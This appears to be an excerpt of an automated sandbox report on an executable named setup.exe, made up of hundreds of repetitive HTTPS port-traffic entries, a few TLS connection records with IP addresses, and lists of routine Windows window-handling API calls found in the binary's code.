                      Source: unknownNetwork traffic detected: HTTP traffic on port 59161 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59289 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59243 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59205 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59278 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59232 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59221 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59244 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59277 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59266 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59184 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59301
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59300
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59255 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59302
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59227 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59158
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59279
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59157
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59278
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59159
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59275
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59274
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59277
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59155
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59276
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59271
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59270
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59152
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59210 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59273
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59272
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59239 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59159 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59285 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59289
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59286
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59285
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59288
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59287
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59282
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59160
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59281
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59284
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59274 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59283
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59160 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59183 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59209 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59240 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59179
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59297
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59296
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59299
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59298
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59293
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59296 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59292
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59295
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59273 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59294
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59290
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59302 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59262 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59194 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59186
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59189
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59188
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59183
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59185
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59184
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59251 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59217 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59181 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59228
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59227
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59229
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59235
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59234
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59237
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59236
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59231
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59275 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59230
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59233
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59298 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59252 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59264 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59300 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59239
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59238
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59208 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59246
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59229 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59245
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59248
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59247
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59192 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59242
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59241
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59244
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59243
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59240
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59286 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59158 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59301 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59263 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59249
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59257
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59256
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59259
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59258
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59253
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59252
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59193 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59255
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59250
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59241 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59268
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59230 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59267
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59312 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59269
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59264
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59263
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59266
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59265
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59297 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59260
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59262
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59261
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59179 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59294 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59191 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59271 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59304 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59247 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59260 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59248 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59282 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59225 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59212 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59293 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59157 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59259 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59303 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59284 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59261 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59189 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59200 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59198
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59197
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59166 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59199
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59194
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59196
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59195
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59237 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59192
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59191
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59155 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59295 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59226 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59211 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59250 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59178 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59283 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59249 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59272 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59238 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59204 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59256 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59279 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59176 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59199 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59233 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59291 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59268 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59222 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59280 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59307 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59215 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59267 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59154 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.8.139:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:59273 version: TLS 1.2
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CAA220 SendMessageW,GetParent,GetParent,GetWindowRect,GetParent,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,MapWindowPoints,FillRect,DeleteDC,SendMessageW,SendMessageW,SendMessageW,0_2_00CAA220
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C889F0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,0_2_00C889F0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC00C0 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00BC00C0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BB9360 NtdllDefWindowProc_W,0_2_00BB9360
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC9430 NtdllDefWindowProc_W,0_2_00BC9430
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BB6670 SysFreeString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString,0_2_00BB6670
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C177A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00C177A0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C689B0 NtdllDefWindowProc_W,0_2_00C689B0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BB9920 NtdllDefWindowProc_W,0_2_00BB9920
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BB6CD0 NtdllDefWindowProc_W,0_2_00BB6CD0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BB8C40 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,0_2_00BB8C40
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC3E40 KillTimer,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,0_2_00BC3E40
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BD6FE0 NtdllDefWindowProc_W,0_2_00BD6FE0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BB5F50 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,0_2_00BB5F50
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BBFF50 NtdllDefWindowProc_W,0_2_00BBFF50
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00C889F0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,3_2_00C889F0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BB60E5 NtdllDefWindowProc_W,3_2_00BB60E5
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BC00C0 NtdllDefWindowProc_W,3_2_00BC00C0
